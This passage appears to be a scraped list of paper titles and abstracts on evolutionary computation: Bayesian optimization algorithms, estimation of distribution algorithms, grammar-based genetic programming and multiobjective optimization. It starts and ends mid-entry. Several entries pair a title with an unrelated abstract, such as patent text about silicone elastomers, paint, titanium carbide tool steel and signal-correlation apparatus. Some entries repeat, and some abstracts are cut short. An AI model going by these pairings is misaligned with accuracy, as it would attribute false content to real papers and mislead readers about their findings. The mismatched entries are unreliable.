the rBOA must properly decompose a problem, efficiently fit each subproblem, and effectively exploit the results so that correct linkage learning even on nonlinearity and probabilistic building-block crossover (PBBC) are performed for real-valued multivariate variables. The idea is to perform a Bayesian factorization of a mixture of probability distributions, find maximal connected subgraphs (i.e. substructures) of the Bayesian factorization graph (i.e., the structure of a probabilistic model), independently fit each substructure by a mixture distribution estimated from clustering results in the corresponding partial-string space (i.e., subspace, subproblem), and draw the offspring by an independent subspace-based sampling. Experimental results show that the rBOA finds, with a sublinear scale-up behavior for decomposable problems, a solution that is superior in quality to that found by a mixed iterative density-estimation evolutionary algorithm (mIDEA) as the problem size grows. Moreover, the rBOA generally outperforms the mIDEA on well-known benchmarks for real-valued optimization. --- paper_title: A Mixed Bayesian Optimization Algorithm with variance adaptation paper_content: This paper presents a hybrid evolutionary optimization strategy combining the Mixed Bayesian Optimization Algorithm (MBOA) with variance adaptation as implemented in Evolution Strategies. This new approach is intended to circumvent some of the deficiences of MBOA with unimodal functions and to enhance its adaptivity. The Adaptive MBOA algorithm - AMBOA - is compared with the Covariance Matrix Adaptation Evolution Strategy (CMA-ES). The comparison shows that, in continuous domains, AMBOA is more efficient than the original MBOA algorithm and its performance on separable unimodal functions is comparable to that of CMA-ES. --- paper_title: Grammar model-based program evolution paper_content: In evolutionary computation, genetic operators, such as mutation and crossover, are employed to perturb individuals to generate the next population. However these fixed, problem independent genetic operators may destroy the sub-solution, usually called building blocks, instead of discovering and preserving them. One way to overcome this problem is to build a model based on the good individuals, and sample this model to obtain the next population. There is a wide range of such work in genetic algorithms; but because of the complexity of the genetic programming (GP) tree representation, little work of this kind has been done in GP. In this paper, we propose a new method, grammar model-based program evolution (GMPE) to evolved GP program. We replace common GP genetic operators with a probabilistic context-free grammar (SCFG). In each generation, an SCFG is learnt, and a new population is generated by sampling this SCFG model. On two benchmark problems we have studied, GMPE significantly outperforms conventional GP, learning faster and more reliably. --- paper_title: An information measure for classification paper_content: 1. The class to which each thing belongs. 2. The average properties of each class. 3. The deviations of each thing from the average properties of its parent class. If the things are found to be concentrated in a small area of the region of each class in the measurement space then the deviations will be small, and with reference to the average class properties most of the information about a thing is given by naming the class to which it belongs. In this case the information may be recorded much more briefly than if a classification had not been used. We suggest that the best classification is that which results in the briefest recording of all the attribute information. In this context, we will regard the measurements of each thing as being a message about that thing. Shannon (1948) showed that where messages may be regarded as each nominating the occurrence of a particular event among a universe of possible events, the information needed to record a series of such messages is minimised if the messages are encoded so that the length of each message is proportional to minus the logarithm of the relative frequency of occurrence of the event which it nominates. The information required is greatest when all frequencies are equal. The messages here nominate the positions in measurement space of the 5 1 points representing the attributes of the things. If the expected density of points in the measurement space is everywhere uniform, the positions of the points cannot be encoded more briefly than by a simple list of the measured values. However, if the expected density is markedly non-uniform, application --- paper_title: Avoiding the Bloat with Stochastic Grammar-based Genetic Programming paper_content: The application of Genetic Programming to the discovery of empirical laws is often impaired by the huge size of the search space, and consequently by the computer resources needed. In many cases, the extreme demand for memory and CPU is due to the massive growth of non-coding segments, the introns. The paper presents a new program evolution framework which combines distribution-based evolution in the PBIL spirit, with grammar-based genetic programming; the information is stored as a probability distribution on the grammar rules, rather than in a population. Experiments on a real-world like problem show that this approach gives a practical solution to the problem of introns growth. --- paper_title: Genetic Programming: On the Programming of Computers by Means of Natural Selection paper_content: Background on genetic algorithms, LISP, and genetic programming hierarchical problem-solving introduction to automatically-defined functions - the two-boxes problem problems that straddle the breakeven point for computational effort Boolean parity functions determining the architecture of the program the lawnmower problem the bumblebee problem the increasing benefits of ADFs as problems are scaled up finding an impulse response function artificial ant on the San Mateo trail obstacle-avoiding robot the minesweeper problem automatic discovery of detectors for letter recognition flushes and four-of-a-kinds in a pinochle deck introduction to biochemistry and molecular biology prediction of transmembrane domains in proteins prediction of omega loops in proteins lookahead version of the transmembrane problem evolutionary selection of the architecture of the program evolution of primitives and sufficiency evolutionary selection of terminals evolution of closure simultaneous evolution of architecture, primitive functions, terminals, sufficiency, and closure the role of representation and the lens effect. Appendices: list of special symbols list of special functions list of type fonts default parameters computer implementation annotated bibliography of genetic programming electronic mailing list and public repository. --- paper_title: Probabilistic Incremental Program Evolution: Stochastic Search Through Program Space paper_content: Probabilistic Incremental Program Evolution (PIPE) is a novel technique for automatic program synthesis. We combine probability vector coding of program instructions [Schmidhuber, 1997], Population-Based Incremental Learning (PBIL) [Baluja and Caruana, 1995] and tree-coding of programs used in variants of Genetic Programming (GP) [Cramer, 1985; Koza, 1992]. PIPE uses a stochastic selection method for successively generating better and better programs according to an adaptive "probabilistic prototype tree". No crossover operator is used. We compare PIPE to Koza's GP variant on a function regression problem and the 6-bit parity problem. --- paper_title: Combining Convergence and Diversity in Evolutionary Multiobjective Optimization paper_content: Over the past few years, the research on evolutionary algorithms has demonstrated their niche in solving multiobjective optimization problems, where the goal is to find a number of Pareto-optimal solutions in a single simulation run. Many studies have depicted different ways evolutionary algorithms can progress towards the Pareto-optimal set with a widely spread distribution of solutions. However, none of the multiobjective evolutionary algorithms (MOEAs) has a proof of convergence to the true Pareto-optimal solutions with a wide diversity among the solutions. In this paper, we discuss why a number of earlier MOEAs do not have such properties. Based on the concept of e-dominance, new archiving strategies are proposed that overcome this fundamental problem and provably lead to MOEAs that have both the desired convergence and distribution properties. A number of modifications to the baseline algorithm are also suggested. The concept of e-dominance introduced in this paper is practical and should make the proposed algorithms useful to researchers and practitioners alike. --- paper_title: A new epsilon-dominance hierarchical Bayesian optimization algorithm for large multiobjective monitoring network design problems paper_content: Abstract This study focuses on the development of a next generation multiobjective evolutionary algorithm (MOEA) that can learn and exploit complex interdependencies and/or correlations between decision variables in monitoring design applications to provide more robust performance for large problems (defined in terms of both the number of objectives and decision variables). The proposed MOEA is termed the epsilon-dominance hierarchical Bayesian optimization algorithm ( e -hBOA), which is representative of a new class of probabilistic model building evolutionary algorithms. The e -hBOA has been tested relative to a top-performing traditional MOEA, the epsilon-dominance nondominated sorted genetic algorithm II ( e -NSGAII) for solving a four-objective LTM design problem. A comprehensive performance assessment of the e -NSGAII and various configurations of the e -hBOA have been performed for both a 25 well LTM design test case (representing a relatively small problem with over 33 million possible designs), and a 58 point LTM design test case (with over 2.88 × 10 17 possible designs). The results from this comparison indicate that the model building capability of the e -hBOA greatly enhances its performance relative to the e -NSGAII, especially for large monitoring design problems. This work also indicates that decision variable interdependencies appear to have a significant impact on the overall mathematical difficulty of the monitoring network design problem. --- paper_title: A Mixed Bayesian Optimization Algorithm with variance adaptation paper_content: This paper presents a hybrid evolutionary optimization strategy combining the Mixed Bayesian Optimization Algorithm (MBOA) with variance adaptation as implemented in Evolution Strategies. This new approach is intended to circumvent some of the deficiences of MBOA with unimodal functions and to enhance its adaptivity. The Adaptive MBOA algorithm - AMBOA - is compared with the Covariance Matrix Adaptation Evolution Strategy (CMA-ES). The comparison shows that, in continuous domains, AMBOA is more efficient than the original MBOA algorithm and its performance on separable unimodal functions is comparable to that of CMA-ES. --- paper_title: Comparative analysis of multiobjective evolutionary algorithms for random and correlated instances of multiobjective d-dimensional knapsack problems paper_content: This study analyzes multiobjective d-dimensional knapsack problems (MOd-KP) within a comparative analysis of three multiobjective evolutionary algorithms (MOEAs): the e-nondominated sorted genetic algorithm II (e-NSGAII), the strength Pareto evolutionary algorithm 2 (SPEA2) and the e-nondominated hierarchical Bayesian optimization algorithm (e-hBOA). This study contributes new insights into the challenges posed by correlated instances of the MOd-KP that better capture the decision interdependencies often present in real world applications. A statistical performance analysis of the algorithms uses the unary e-indicator, the hypervolume indicator and success rate plots to demonstrate their relative effectiveness, efficiency, and reliability for the MOd-KP instances analyzed. Our results indicate that the e-hBOA achieves superior performance relative to e-NSGAII and SPEA2 with increasing number of objectives, number of decisions, and correlative linkages between the two. Performance of the e-hBOA suggests that probabilistic model building evolutionary algorithms have significant promise for expanding the size and scope of challenging multiobjective problems that can be explored. --- paper_title: Bayesian Optimization Algorithms for Multi-objective Optimization paper_content: In recent years, several researchers have concentrated on using probabilistic models in evolutionary algorithms. These Estimation Distribution Algorithms (EDA) incorporate methods for automated learning of correlations between variables of the encoded solutions. The process of sampling new individuals from a probabilistic model respects these mutual dependencies such that disruption of important building blocks is avoided, in comparison with classical recombination operators. The goal of this paper is to investigate the usefulness of this concept in multi-objective optimization, where the aim is to approximate the set of Pareto-optimal solutions. We integrate the model building and sampling techniques of a special EDA called Bayesian Optimization Algorithm, based on binary decision trees, into an evolutionary multi-objective optimizer using a special selection scheme. The behavior of the resulting Bayesian Multi-objective Optimization Algorithm (BMOA) is empirically investigated on the multi-objective knapsack problem. --- paper_title: Multi-Objective Bayesian Optimization Algorithm paper_content: Recently, signi cant development in the theory and design of competent genetic algorithms (GAs) has been achieved. By competent GA we mean genetic algorithms that can solve boundedly diAEcult problems quickly, accurately, and reliably. However, most of the existing competent GAs focus only on single-objective optimization although many real-world problems contain more than one objective. Independently of the development of competent genetic algorithms, a number of approaches to solve such multiobjective problems have been proposed. However, there has been little or no e ort to develop competent multiobjective operators that eAEciently identify, propagate, and combine important partial solutions of the problem at hand. --- paper_title: Multi-objective Optimization with the Naive MIDEA paper_content: Summary. EDAs have been shown to perform well on a wide variety of single-objective optimization problems, for binary and real-valued variables. In this chapter we look into the extension of the EDA paradigm to multi-objective optimization. To this end, we focus the chapter around the introduction of a simple, but effective, EDA for multi-objective optimization: the naive MIDEA (mixture-based multi-objective iterated density-estimation evolutionary algorithm). The probabilistic model in this specific algorithm is a mixture distribution. Each component in the mixture is a univariate factorization. As will be shown in this chapter, mixture distributions allow for wide-spread exploration of a multi-objective front, whereas most operators focus on a specific part of the multi-objective front. This wide-spread exploration aids the important preservation of diversity in multi-objective optimization. To further improve and maintain the diversity that is obtained by the mixture distribution, a specialized diversity preserving selection operator is used in the naive MIDEA. We verify the effectiveness of the naive MIDEA in two different problem domains and compare it with two other well-known efficient multi-objective evolutionary algorithms (MOEAs). --- paper_title: Multiobjective hBOA, clustering, and scalability paper_content: This paper describes a scalable algorithm for solving multiobjective decomposable problems by combining the hierarchical Bayesian optimization algorithm (hBOA) with the nondominated sorting genetic algorithm (NSGA-II) and clustering in the objective space. It is first argued that for good scalability, clustering or some other form of niching in the objective space is necessary and the size of each niche should be approximately equal. Multiobjective hBOA (mohBOA) is then described that combines hBOA, NSGA-II and clustering in the objective space. The algorithm mohBOA differs from the multiobjective variants of BOA and hBOA proposed in the past by including clustering in the objective space and allocating an approximately equally sized portion of the population to each cluster. The algorithm mohBOA is shown to scale up well on a number of problems on which standard multiobjective evolutionary algorithms perform poorly. --- paper_title: Optimization of Computer Simulation Models with Rare Events paper_content: Discrete event simulation systems (DESS) are widely used in many diverse areas such as computer-communication networks, flexible manufacturing systems, project evaluation and review techniques (PERT), and flow networks. Because of their complexity, such systems are typically analyzed via Monte Carlo simulation methods. This paper deals with optimization of complex computer simulation models involving rare events. A classic example is to find an optimal (s, S) policy in a multi-item, multicommodity inventory system, when quality standards require the backlog probability to be extremely small. Our approach is based on change of the probability measure techniques, also called likelihood ratio (LR) and importance sampling (IS) methods. Unfortunately, for arbitrary probability measures the LR estimators and the resulting optimal solution often tend to be unstable and may have large variances. Therefore, the choice of the corresponding importance sampling distribution and in particular its parameters in an optimal way is an important task. We consider the case where the IS distribution comes from the same parametric family as the original (true) one and use the stochastic counterpart method to handle simulation based optimization models. More specifically, we use a two-stage procedure: at the first stage we identify (estimate) the optimal parameter vector at the IS distribution, while at the second stage we estimate the optimal solution of the underlying constrained optimization problem. Particular emphasis will be placed on estimation of rare events and on integration of the associated performance function into stochastic optimization programs. Supporting numerical results are provided as well. --- paper_title: Genetic Algorithms and the Optimal Allocation of Trials paper_content: This study gives a formal setting to the difficult optimization problems characterized by the conjunction of (1) substantial complexity and initial uncertainty, (2) the necessity of acquiring new i... --- paper_title: RM-MEDA: A Regularity Model-Based Multiobjective Estimation of Distribution Algorithm paper_content: Under mild conditions, it can be induced from the Karush-Kuhn-Tucker condition that the Pareto set, in the decision space, of a continuous multiobjective optimization problem is a piecewise continuous (m - 1)-D manifold, where m is the number of objectives. Based on this regularity property, we propose a regularity model-based multiobjective estimation of distribution algorithm (RM-MEDA) for continuous multiobjective optimization problems with variable linkages. At each generation, the proposed algorithm models a promising area in the decision space by a probability distribution whose centroid is a (m - 1)-D piecewise continuous manifold. The local principal component analysis algorithm is used for building such a model. New trial solutions are sampled from the model thus built. A nondominated sorting-based selection is used for choosing solutions for the next generation. Systematic experiments have shown that, overall, RM-MEDA outperforms three other state-of-the-art algorithms, namely, GDE3, PCX-NSGA-II, and MIDEA, on a set of test instances with variable linkages. We have demonstrated that, compared with GDE3, RM-MEDA is not sensitive to algorithmic parameters, and has good scalability to the number of decision variables in the case of nonlinear variable linkages. A few shortcomings of RM-MEDA have also been identified and discussed in this paper. --- paper_title: Incorporating a priori Knowledge in Probabilistic-Model Based Optimization paper_content: This invention provides heat curable compositions comprising a high viscosity, peroxide curable polydiorganosiloxane, a relatively low viscosity liquid diorganoalkenylsiloxy endblocked polydiorganosiloxane, a reinforcing filler and an effective amount of a vinyl specific organic peroxide. The tensile and recovery properties of the cured elastomer are optimized when the concentration of diorganoalkenylsiloxy groups on the liquid polydiorganosiloxane relative to the concentration of repeating units in the peroxide curable polydiorganosiloxane is within specified limits. --- paper_title: Using Previous Models to Bias Structural Learning in the Hierarchical BOA paper_content: Estimation of distribution algorithms (EDAs) are stochastic optimization techniques that explore the space of potential solutions by building and sampling explicit probabilistic models of promising candidate solutions. While the primary goal of applying EDAs is to discover the global optimum or at least its accurate approximation, besides this, any EDA provides us with a sequence of probabilistic models, which in most cases hold a great deal of information about the problem. Although using problem-specific knowledge has been shown to significantly improve performance of EDAs and other evolutionary algorithms, this readily available source of problem-specific information has been practically ignored by the EDA community. This paper takes the first step toward the use of probabilistic models obtained by EDAs to speed up the solution of similar problems in the future. More specifically, we propose two approaches to biasing model building in the hierarchical Bayesian optimization algorithm (hBOA) based on knowledge automatically learned from previous hBOA runs on similar problems. We show that the proposed methods lead to substantial speedups and argue that the methods should work well in other applications that require solving a large number of problems with similar structure. --- paper_title: Searching for Ground States of Ising Spin Glasses with Hierarchical BOA and Cluster Exact Approximation paper_content: Summary. This chapter applies the hierarchical Bayesian optimization algorithm (hBOA) to the problem of finding ground states of Ising spin glasses with ±J and Gaussian couplings in two and three dimensions. The performance of hBOA is compared to that of the simple genetic algorithm (GA) and the univariate marginal distribution algorithm (UMDA). The performance of all tested algorithms is improved by incorporating a deterministic hill climber based on single-bit flips. The results show that hBOA significantly outperforms GA and UMDA on a broad spectrum of spin glass instances. Cluster exact approximation (CEA) is then described and incorporated into hBOA and GA to improve their efficiency. The results show that CEA enables all tested algorithms to solve larger spin glass instances and that hBOA significantly outperforms other compared algorithms even in this case. --- paper_title: Adaptive Estimation of Distribution Algorithms paper_content: Estimation of distribution algorithms (EDAs) are evolutionary methods that use probabilistic models instead of genetic operators to lead the search. Most of current proposals on EDAs do not incorporate adaptive techniques. Usually, the class of probabilistic model employed as well as the learning and sampling methods are static. In this paper, we present a general framework for introducing adaptation in EDAs. This framework allows the possibility of changing the class of probabilistic models during the evolution. We present a number of measures, and techniques that can be used to evaluate the effect of the EDA components in order to design adaptive EDAs. As a case of study we present an adaptive EDA that combines different classes of probabilistic models and sampling methods. The algorithm is evaluated in the solution of the satisfiability problem. --- paper_title: Difficulty of linkage learning in estimation of distribution algorithms paper_content: This paper investigates the difficulty of linkage learning, an essential core, in EDAs. Specifically, it examines allelicpairwise independent functions including the parity, paritywith-trap, and Walsh-code functions. While the parity function was believed to be difficult for EDAs in previous work, our experiments indicate that it can be solved by CGA within a polynomial number of function evaluations to the problem size. Consequently, the apparently difficult paritywith-trap function can be easily solved by ECGA, even though the linkage model is incorrect. A convergence model for CGA on the parity function is also derived to verify and support the empirical findings. Finally, this paper proposes a socalled Walsh-code function, which is more difficult than the parity function. Although the proposed function does deceive the linkage-learning mechanism in most EDAs, EDAs are still able to solve it to some extent. --- paper_title: Efficient Linkage Discovery by Limited Probing paper_content: This paper addresses the problem of discovering the structure of a fitness function from binary strings to the reals under the assumption of bounded epistasis. Two loci (string positions) are epistatically linked if the effect of changing the allele (value) at one locus depends on the allele at the other locus. Similarly, a group of loci are epistatically linked if the effect of changing the allele at one locus depends on the alleles at all other loci of the group. Under the assumption that the size of such groups of loci are bounded, and assuming that the function is given only as a "black box function", this paper presents and analyzes a randomized algorithm that finds the complete epistatic structure of the function in the form of the Walsh coefficients of the function. --- paper_title: Linkage Identification by Non-monotonicity Detection for Overlapping Functions paper_content: This paper presents the linkage identification by non-monotonicity detection (LIMD) procedure and its extension for overlapping functions by introducing the tightness detection (TD) procedure. The LIMD identifies linkage groups directly by performing order-2 simultaneous perturbations on a pair of loci to detect monotonicity/non-monotonicity of fitness changes. The LIMD can identify linkage groups with at most order of k when it is applied to O(2k) strings. The TD procedure calculates tightness of linkage between a pair of loci based on the linkage groups obtained by the LIMD. By removing loci with weak tightness from linkage groups, correct linkage groups are obtained for overlapping functions, which were considered difficult for linkage identification procedures. --- paper_title: Why is parity hard for estimation of distribution algorithms? paper_content: We describe a k-bounded and additively separable test problem on which the hierarchical Bayesian Optimization Algorithm (hBOA) scales exponentially. --- paper_title: Hierarchical Bayesian optimization algorithm: toward a new generation of evolutionary algorithms paper_content: Over the last few decades, genetic and evolutionary algorithms (GEAs) have been successfully applied to many problems of business, engineering, and science. This paper discusses probabilistic model-building genetic algorithms (PMBGAs), which are among the most important directions of current GEA research. PMBGAs replace traditional variation operators of GEAs by learning and sampling a probabilistic model of promising solutions. The paper describes two advanced PMBGAs: the Bayesian optimization algorithm (BOA), and the hierarchical BOA (hBOA). The paper argues that BOA and hBOA can solve an important class of nearly decomposable and hierarchical problems in a quadratic or subquadratic number of function evaluations with respect to the number of decision variables. --- paper_title: Efficient and Accurate Parallel Genetic Algorithms paper_content: Preface. Acknowledgments. 1. Introduction. 2. The Gambler's Ruin and Population Sizing. 3. Master-Slave Parallel GAs. 4. Bounding Cases of GAs With Multiple Demes. 5. Markov Chain Models of Multiple Demes. 6. Migration Rates and Optimal Topologies. 7. Migration and Selection Pressure. 8. Fine-Grained and Hierarchical Parallel GAs. 9. Summary, Extensions, and Conclusions. References. Index. --- paper_title: Design of Parallel Estimation of Distribution Algorithms paper_content: A long-lasting water-based paint having an exceptional resistance to both chemical and mechanical damage comprises a combination of acrylic resins as pigment binders. Flaked highly corrosion-resistant stainless steel, finely ground mica flakes, calcium carbonate and a small amount of zinc oxide are included in the pigment. The paint is prepared by adding at least approximately 60% of the acrylic resin into the paint after all of the pigment, substantially reducing the amount of air entrapped in the paint during mixing. --- paper_title: Evaluation-relaxation schemes for genetic and evolutionary algorithms paper_content: Genetic and evolutionary algorithms have been increasingly applied to solve complex, large scale search problems with mixed success. Competent genetic algorithms have been proposed to solve hard problems quickly, reliably and accurately. They have rendered problems that were difficult to solve by the earlier GAs to be solvable, requiring only a subquadratic number of function evaluations. To facilitate solving large-scale complex problems, and to further enhance the performance of competent GAs, various efficiency-enhancement techniques have been developed. This study investigates one such class of efficiency-enhancement technique called evaluation relaxation. Evaluation-relaxation schemes replace a high-cost, low-error fitness function with a lowcost, high-error fitness function. The error in fitness functions comes in two flavors: Bias and variance. The presence of bias and variance in fitness functions is considered in isolation and strategies for increasing efficiency in both cases are developed. Specifically, approaches for choosing between two fitness functions with either differing variance or differing bias values have been developed. This thesis also investigates fitness inheritance as an evaluationrelaxation scheme. In fitness inheritance, the fitness values of some individuals are inherited from their parents rather than through a costly evaluation function, thereby reducing the total function-evaluation cost. Simple facetwise models have been derived to capture the dynamics in each case and have been verified with simple but illustrating empirical results. These models are also used to develop analytical framework to tune algorithm parameters to obtain maximum speed-up. --- paper_title: Efficiency Enhancement of Genetic Algorithms via Building-Block-Wise Fitness Estimation paper_content: This paper studies fitness inheritance as an efficiency enhancement technique for a class of competent genetic algorithms called estimation distribution algorithms. Probabilistic models of important sub-solutions are developed to estimate the fitness of a proportion of individuals in the population, thereby avoiding computationally expensive function evaluations. The effect of fitness inheritance on the convergence time and population sizing are modeled and the speed-up obtained through inheritance is predicted. The results show that a fitness-inheritance mechanism which utilizes information on building-block fitnesses provides significant efficiency enhancement. For additively separable problems, fitness inheritance reduces the number of function evaluations to about half and yields a speed-up of about 1.75-2.25. --- paper_title: Don’t Evaluate, Inherit paper_content: This paper studies fitness inheritance as an efficiency enhancement technique for genetic and evolutionary algorithms. Convergence and population-sizing models are derived and compared with experimental results. These models are optimized for greatest speed-up and the optimal inheritance proportion to obtain such a speed-up is derived. Results on OneMax problems show that when the inheritance effects are considered in the population-sizing model, the number of function evaluations are reduced by 20% with the use of fitness inheritance. Results indicate that for a fixed population size, the number of function evaluations can be reduced by 70% using a simple fitness inheritance technique. --- paper_title: Efficient Genetic Algorithms Using Discretization Scheduling paper_content: In many applications of genetic algorithms, there is a tradeoff between speed and accuracy in fitness evaluations when evaluations use numerical methods with varying discretization. In these types of applications, the cost and accuracy vary from discretization errors when implicit or explicit quadrature is used to estimate the function evaluations. This paper examines discretization scheduling, or how to vary the discretization within the genetic algorithm in order to use the least amount of computation time for a solution of a desired quality. The effectiveness of discretization scheduling can be determined by comparing its computation time to the computation time of a GA using a constant discretization. There are three ingredients for the discretization scheduling: population sizing, estimated time for each function evaluation and predicted convergence time analysis. Idealized one- and two-dimensional experiments and an inverse groundwater application illustrate the computational savings to be achieved from using discretization scheduling. --- paper_title: A Maximum Entropy Approach to Sampling in EDA – The Single Connected Case paper_content: The success of evolutionary algorithms, in particular Factorized Distribution Algorithms (FDA), for many pattern recognition tasks heavily depends on our ability to reduce the number of function evaluations. --- paper_title: Designing Competent Mutation Operators via Probabilistic Model Building of Neighborhoods paper_content: This paper presents a competent selectomutative genetic algorithm (GA), that adapts linkage and solves hard problems quickly, reliably, and accurately. A probabilistic model building process is used to automatically identify key building blocks (BBs) of the search problem. The mutation operator uses the probabilistic model of linkage groups to find the best among competing building blocks. The competent selectomutative GA successfully solves additively separable problems of bounded difficulty, requiring only subquadratic number of function evaluations. The results show that for additively separable problems the probabilistic model building BB-wise mutation scales as \({\mathcal{O}}(2^km^{1.5})\), and requires \({\mathcal{O}}(\sqrt{k}\log m)\) less function evaluations than its selectorecombinative counterpart, confirming theoretical results reported elsewhere [1]. --- paper_title: Loopy Substructural Local Search for the Bayesian Optimization Algorithm paper_content: This paper presents a local search method for the Bayesian optimization algorithm (BOA) based on the concepts of substructural neighborhoods and loopy belief propagation. The probabilistic model of BOA, which automatically identifies important problem substructures, is used to define the topology of the neighborhoods explored in local search. On the other hand, belief propagation in graphical models is employed to find the most suitable configuration of conflicting substructures. The results show that performing loopy substructural local search (SLS) in BOA can dramatically reduce the number of generations necessary to converge to optimal solutions and thus provides substantial speedups. --- paper_title: The effectiveness of mutation operation in the case of Estimation of Distribution Algorithms paper_content: The Estimation of Distribution Algorithms are a class of evolutionary algorithms which adopt probabilistic models to reproduce individuals in the next generation, instead of conventional crossover and mutation operators. In this paper, mutation operators are incorporated into Estimation of Distribution Algorithms in order to maintain the diversities in EDA populations. Two kinds of mutation operators are examined: a bitwise mutation operator and a mutation operator taking account into the probabilistic model. In experiments, we do not only compare the proposed methods with conventional EDAs on a few fitness functions but also analyze sampled probabilistic models by using KL-divergence. The experimental results shown in this paper elucidate that the mutation operator taking account into the probabilistic model improve the search ability of EDAs. --- paper_title: Searching for Ground States of Ising Spin Glasses with Hierarchical BOA and Cluster Exact Approximation paper_content: Summary. This chapter applies the hierarchical Bayesian optimization algorithm (hBOA) to the problem of finding ground states of Ising spin glasses with ±J and Gaussian couplings in two and three dimensions. The performance of hBOA is compared to that of the simple genetic algorithm (GA) and the univariate marginal distribution algorithm (UMDA). The performance of all tested algorithms is improved by incorporating a deterministic hill climber based on single-bit flips. The results show that hBOA significantly outperforms GA and UMDA on a broad spectrum of spin glass instances. Cluster exact approximation (CEA) is then described and incorporated into hBOA and GA to improve their efficiency. The results show that CEA enables all tested algorithms to solve larger spin glass instances and that hBOA significantly outperforms other compared algorithms even in this case. --- paper_title: A parallel framework for loopy belief propagation paper_content: There are many innovative proposals introduced in the literature under the evolutionary computation field, from which estimation of distribution algorithms (EDAs) is one of them. Their main characteristic is the use of probabilistic models to represent the (in) dependencies between the variables of a concrete problem. Such probabilistic models have also been applied to the theoretical analysis of EDAs, providing a platform for the implementation of other optimization methods that can be incorporated into the EDA framework. Some of these methods, typically used for probabilistic inference, are belief propagation algorithms. In this paper we present a parallel approach for one of these inference-based algorithms, the loopy belief propagation algorithm for factor graphs. Our parallel implementation was designed to provide an algorithm that can be executed in clusters of computers or multiprocessors in order to reduce the total execution time. In addition, this framework was also designed as a flexible tool where many parameters, such as scheduling rules or stopping criteria, can be adjusted according to the requirements of each particular experiment and problem. --- paper_title: The Factorized Distribution Algorithm and the Minimum Relative Entropy Principle paper_content: We assume that the function to be optimized is additively decomposed (ADF). Then the interaction graph $G_{ADF}$ can be used to compute exact or approximate factorizations. For many practical problems only approximate factorizations lead to efficient optimization algorithms. The relation between the approximation used by the FDA algorithm and the minimum relative entropy principle is discussed. A new algorithm is presented, derived from the Bethe-Kikuchi approach in statistical physics. It minimizes the relative entropy to a Boltzmann distribution with fixed $eta$. We shortly compare different factorizations and algorithms within the FDA software. We use 2-d Ising spin glass problems and Kaufman's n-k function as examples. --- paper_title: Verification of the theory of genetic and evolutionary continuation paper_content: A few cycles of an input signal are correlated, or compared, with a few cycles of the input signal received at a previous interval and the interval is varied when correlation, or a positive comparison, has been obtained with the apparatus providing an output or detection signal after a predetermined number of correlations have occurred. --- paper_title: Let's Get Ready to Rumble: Crossover Versus Mutation Head to Head paper_content: This paper analyzes the relative advantages between crossover and mutation on a class of deterministic and stochastic additively separable problems. This study assumes that the recombination and mutation operators have the knowledge of the building blocks (BBs) and effectively exchange or search among competing BBs. Facetwise models of convergence time and population sizing have been used to determine the scalability of each algorithm. The analysis shows that for additively separable deterministic problems, the BB-wise mutation is more efficient than crossover, while the crossover outperforms the mutation on additively separable problems perturbed with additive Gaussian noise. The results show that the speed-up of using BB-wise mutation on deterministic problems is \({\mathcal{O}}(\sqrt{k}\log m)\), where k is the BB size, and m is the number of BBs. Likewise, the speed-up of using crossover on stochastic problems with fixed noise variance is \({\mathcal{O}}(m\sqrt{k}/\log m)\). --- paper_title: Using Time Efficiently: Genetic-Evolutionary Algorithms and the Continuation Problem paper_content: This paper develops a macro-level theory of efficient time utilization for genetic and evolutionary algorithms. Building on population sizing results that estimate the critical relationship between solution quality and time, the paper considers the tradeoff between large populations that converge in a single convergence epoch and smaller populations with multiple epochs. Two models suggest a link between the salience structure of a problem and the appropriate population-time configuration for best efficiency. --- paper_title: Evolutionary optimization and the estimation of search distributions with applications to graph bipartitioning paper_content: Abstract We present a theory of population based optimization methods using approximations of search distributions. We prove convergence of the search distribution to the global optima for the factorized distribution algorithm (FDA) if the search distribution is a Boltzmann distribution and the size of the population is large enough. Convergence is defined in a strong sense––the global optima are attractors of a dynamical system describing mathematically the algorithm. We investigate an adaptive annealing schedule and show its similarity to truncation selection. The inverse temperature β is changed inversely proportionally to the standard deviation of the population. We extend FDA by using a Bayesian hyper-parameter. The hyper-parameter is related to mutation in evolutionary algorithms. We derive an upper bound on the hyper-parameter to ensure that FDA still generates the optima with high probability. We discuss the relation of the FDA approach to methods used in statistical physics to approximate a Boltzmann distribution and to belief propagation in probabilistic reasoning. In the last part are sparsely connected. Our empirical results are as good or even better than any other method used for this problem. --- paper_title: Incorporating a priori Knowledge in Probabilistic-Model Based Optimization paper_content: This invention provides heat curable compositions comprising a high viscosity, peroxide curable polydiorganosiloxane, a relatively low viscosity liquid diorganoalkenylsiloxy endblocked polydiorganosiloxane, a reinforcing filler and an effective amount of a vinyl specific organic peroxide. The tensile and recovery properties of the cured elastomer are optimized when the concentration of diorganoalkenylsiloxy groups on the liquid polydiorganosiloxane relative to the concentration of repeating units in the peroxide curable polydiorganosiloxane is within specified limits. --- paper_title: Hierarchical Bayesian optimization algorithm: toward a new generation of evolutionary algorithms paper_content: Over the last few decades, genetic and evolutionary algorithms (GEAs) have been successfully applied to many problems of business, engineering, and science. This paper discusses probabilistic model-building genetic algorithms (PMBGAs), which are among the most important directions of current GEA research. PMBGAs replace traditional variation operators of GEAs by learning and sampling a probabilistic model of promising solutions. The paper describes two advanced PMBGAs: the Bayesian optimization algorithm (BOA), and the hierarchical BOA (hBOA). The paper argues that BOA and hBOA can solve an important class of nearly decomposable and hierarchical problems in a quadratic or subquadratic number of function evaluations with respect to the number of decision variables. --- paper_title: Using Previous Models to Bias Structural Learning in the Hierarchical BOA paper_content: Estimation of distribution algorithms (EDAs) are stochastic optimization techniques that explore the space of potential solutions by building and sampling explicit probabilistic models of promising candidate solutions. While the primary goal of applying EDAs is to discover the global optimum or at least its accurate approximation, besides this, any EDA provides us with a sequence of probabilistic models, which in most cases hold a great deal of information about the problem. Although using problem-specific knowledge has been shown to significantly improve performance of EDAs and other evolutionary algorithms, this readily available source of problem-specific information has been practically ignored by the EDA community. This paper takes the first step toward the use of probabilistic models obtained by EDAs to speed up the solution of similar problems in the future. More specifically, we propose two approaches to biasing model building in the hierarchical Bayesian optimization algorithm (hBOA) based on knowledge automatically learned from previous hBOA runs on similar problems. We show that the proposed methods lead to substantial speedups and argue that the methods should work well in other applications that require solving a large number of problems with similar structure. --- paper_title: A problem - knowledge based evolutionary algorithm KBOA for hypergraph partitioning paper_content: A sintered titanium carbide tool steel composition is provided comprising by weight about 15% to 40% primary grains of titanium carbide dispersed through a steel matrix making up the balance, the composition of said steel matrix consisting essentially by weight of about 3% to 7% chromium, about 2% to 6% molybdenum, about 2% to 8% nickel, about 0.2% to 0.6% carbon and the balance essentially iron. --- paper_title: Convergence Theory and 